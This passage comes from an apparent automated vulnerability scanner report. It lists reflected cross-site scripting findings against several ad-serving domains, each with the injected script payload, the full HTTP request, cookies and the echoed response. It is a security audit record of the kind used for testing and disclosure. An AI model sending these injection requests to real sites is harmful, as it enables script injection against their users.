Path:	/2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb522"><script>alert(1)</script>402135baf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLXfb522"><script>alert(1)</script>402135baf54/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660; Dominos=DataXuB3; RMFM=011PhXovU106w2; session=1295919344|1295919347

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:30:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLXfb522"><script>alert(1)</script>402135baf54/1175098218/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

4.44. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebfa7"><script>alert(1)</script>f3beed6f077 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x71ebfa7"><script>alert(1)</script>f3beed6f077 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660; Dominos=DataXuB3; RMFM=011PhXovU106w2; session=1295919344|1295919347

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:30:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 318
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/55441945/x71ebfa7"><script>alert(1)</script>f3beed6f077/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC=
...[SNIP]...

4.45. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e85b3"><script>alert(1)</script>c1623e50091 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3e85b3"><script>alert(1)</script>c1623e50091/Dominos/11Q1/Opt/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3e85b3"><script>alert(1)</script>c1623e50091/Dominos/11Q1/Opt/120/1[timestamp]/1293087884/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.46. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd703"><script>alert(1)</script>0833f72734d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominosbd703"><script>alert(1)</script>0833f72734d/11Q1/Opt/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominosbd703"><script>alert(1)</script>0833f72734d/11Q1/Opt/120/1[timestamp]/1325161057/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.47. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71872"><script>alert(1)</script>6ced5e37719 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominos/11Q171872"><script>alert(1)</script>6ced5e37719/Opt/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 362
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominos/11Q171872"><script>alert(1)</script>6ced5e37719/Opt/120/1[timestamp]/1889488496/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.48. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64bfe"><script>alert(1)</script>ddbcff87e70 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominos/11Q1/Opt64bfe"><script>alert(1)</script>ddbcff87e70/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominos/11Q1/Opt64bfe"><script>alert(1)</script>ddbcff87e70/120/1[timestamp]/902406755/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.49. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e69"><script>alert(1)</script>5d8b3695d63 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominos/11Q1/Opt/12037e69"><script>alert(1)</script>5d8b3695d63/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominos/11Q1/Opt/12037e69"><script>alert(1)</script>5d8b3695d63/1[timestamp]/641958665/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.50. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 679d0"><script>alert(1)</script>49f4f95843e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90679d0"><script>alert(1)</script>49f4f95843e HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:30:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]/1598009652/x90679d0"><script>alert(1)</script>49f4f95843e/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.51. http://bid.openx.net/json [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2e0e8%3balert(1)//1d431df288b was submitted in the c parameter. This input was echoed as 2e0e8;alert(1)//1d431df288b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /json?c=OXM_327285992212e0e8%3balert(1)//1d431df288b&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=728x90&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17101&hrid=39925b34906404a722d1479181f4316b-1295921102&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe; s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; p=1295921102; _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: _wc[1295921102372]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: p=1295929665; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

(function(){var req={f:OXM_327285992212e0e8;alert(1)//1d431df288b,o:null,w:13940000,c:"\u003cscript type\u003d'text/javascript'\u003evar isIE \u003d false;\u003c/script\u003e\u003c!--[if IE]\u003e\u003cscript type\u003d'text/javascript'\u003eisIE \u003d true;\u003c/
...[SNIP]...

4.52. http://bid.openx.net/json [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload b3df4<script>alert(1)</script>6007943e0fa was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_15781025984b3df4<script>alert(1)</script>6007943e0fa&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=468x60&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17099&hrid=dda27c0e92ce176b4b94dc8a5861a24c-1295921101&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=72705fd6-57d0-40f5-a439-a5c5015891a3; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1295929663; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_15781025984b3df4<script>alert(1)</script>6007943e0fa({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGWPP07DMBxGn13iOHZoFkBigUowElEhNyED7
...[SNIP]...

4.53. http://c5.zedo.com//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://c5.zedo.com
Path:	//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 320ca'%3bd13e48cf55b was submitted in the REST URL parameter 7. This input was echoed as 320ca';d13e48cf55b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/886284/2333/172/0/305002290320ca'%3bd13e48cf55b/305002290//0/305/788//2000004/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1; ZFFAbh=749B826,20|1483_749#365; FFgeo=5386156; FFcat=305,2290,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
